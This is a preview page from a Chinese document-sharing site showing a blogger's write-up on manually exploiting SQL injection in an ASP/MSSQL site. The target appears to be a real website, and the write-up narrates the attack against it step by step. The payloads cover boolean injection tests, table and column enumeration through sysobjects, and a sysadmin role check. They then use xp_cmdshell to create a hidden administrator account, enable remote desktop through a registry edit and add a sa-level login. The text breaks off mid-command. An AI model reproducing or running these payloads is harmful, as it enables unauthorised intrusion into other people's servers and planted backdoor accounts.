MSSQL手工注入并提权.docx_第1页
MSSQL手工注入并提权.docx_第2页
MSSQL手工注入并提权.docx_第3页
MSSQL手工注入并提权.docx_第4页
MSSQL手工注入并提权.docx_第5页
已阅读5页,还剩3页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

MSSQL手工注入并提权作者:海默Blog:/chjxhyy/目标站:在首页随便点几个链接,加 测试是否存在注入在该链接下报错了。MicrosoftODBC SQL Server DriverSQL Server字符串 237 order by pu_id asc 之前有未闭合的引号。/directory/xxoo.ASP?xx_ID=237(为了避免利用搜索引擎搜到,所以隐藏的比较深)是字符型的。字段后面还有order by 语句,用-注释掉就ok/directory/xxoo.ASP?xx_ID=237 and 1=1-正确/directory/xxoo.ASP?xx_ID=237 and 1=2-报错存在注入,下面习惯性的就是爆表和爆字段。先查看下基本信息:查看MSSQL 数据库版本/directory/xxoo.ASP?xx_ID=237 and 0(select version)为sql server2000的。查看当前数据库/directory/xxoo.ASP?xx_ID=237 and db_name()0当前库的用户/directory/xxoo.ASP?xx_ID=237 and user0是否支持多语句查询/directory/xxoo.ASP?xx_ID=237 ;declare a int 可以。爆表之前还是先找下目录吧,免得得到账号密码找不到后台,不白瞎了。url后面加admin,禁止列目录,后面加个几个常见的都不对,login.asp 、admin.asp 等等还是wwwscan扫下吧,原来是admin_main_asp,点击访问下登陆超时,然后转到了system目录,原来是这个/systemOk,下面爆表吧,第一个/directory/xxoo.ASP?xx_ID=237 and (select top 1 name from sysobjects where xtype=u)0第二个、/directory/xxoo.ASP?xx_ID=237 and (select top 1 name from sysobjects where xtype=u and name not in (sdlabout)0以此类推,爆出如下表:zxkd,yjcx_qs,yjcx_md,yjcx,t_shop,t_publish,t_project,t_logins,t_functions,t_employee_functions,t_employee,sqyj,shopwin,sdlnews,sdlhome,sdl_member_old,sdl_member,SailingSchedule,sailingdata,SailingAdjustmentInformation,RulesOperating,pu_cp,person,OperationalInformation,online_ly,oldSailingSchedule1,oldRulesOperating1,oldnewyunjia1,newyunjia,new_sailingdate,kouan,katj,IndustryNews,hxjx,FeeAdjustmentInformation,execlname,exceldata,dtxx,dtproperties,dcnews,dcmember,dc_sft,dc_sf,dc_jbxx,dc_hy,dc_hw,dc_gk,dc_gg_hw,dc_gg,sdlabout,AgentNetwork,aucclass,cusinfo尼玛,不少啊,累死了。那个是管理表呢,t_logins比较像,就它了爆字段!/directory/xxoo.ASP?xx_ID=237 and (select top 1 col_name(object_id(t_logins),1) from sysobjects)0-然后依次爆出:login_name login_password心里还挺高兴,结果就悲剧了,爆内容的时候居然什么都没有,空表?!/directory/xxoo.ASP?xx_ID=237 and (select top 1 login_name from t_logins)0-看前面的表,就t_logins还沾边,其他的也懒得试了。想其他办法咯。我首先想到了备份拿shell,因为前面显示的用户为dbo,但是问题是不知道路径啊。翻着自己收集的sql语句,看到一句and 1=(select is_srvrolemember(sysadmin)判断数据库用户名是否拥有比较高的权限。/directory/xxoo.ASP?xx_ID=237 and 1=(select is_srvrolemember(sysadmin)Sa权限!接着又来了一句:and 1=(select IS_SRVROLEMEMBER(sysadmin)- 还真是sa权限。我晕前面我怎么没式一下呢。Sa就比较好办了。首先看看xp_cmdshell存储过程/directory/xxoo.ASP?xx_ID=237 and 1=(select count(*) from master.dbo.sysobjects where xtype=x and name=xp_cmdshell)哈哈,存在。直接加用户啦。/directory/xxoo.ASP?xx_ID=237;exec master.xp_cmdshell net user hmhk$ haimohk /add此时,又出现错误:无法装载 DLL x 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)百度了一下,说是由于SQL2000的SA密码过于简单导致。/mlm_mlm/blog/item/30eb9422672d84e6d7cae296.html按着方法,问题解决了,继续加/directory/xxoo.ASP?xx_ID=237;exec master.xp_cmdshell net user hmhk$ haimohk /add/directory/xxoo.ASP?xx_ID=237;exec master.xp_cmdshell net localgroup administrators hmhk$ /add但出现错误了,不知道加上没。Mstsc登陆下试试。这可如何是好。莫非没开,还是端口改了。执行下命令开启3389,/directory/xxoo.ASP?xx_ID=237;exec master.xp_cmdshell REG ADD HKLMSYSTEMCurrentControlSetControlTerminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 再连还是那样。去读端口也没回显啊,又傻了。想了一会,突然想到可以加一个sa权限的数据库用户啊,然后sqlTools连接,又可以做很多事情了,嘎嘎、/directory/xxoo.ASP?xx_ID=237 exec master.dbo.sp_addlogin adm1n,haimohk/directory/xxoo.ASP?xx_ID=237 exec master.dbo.sp_adds
人人文库> 全部分类> 专业文献 > 生活休闲

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

最新文档

评论

0/150

提交评论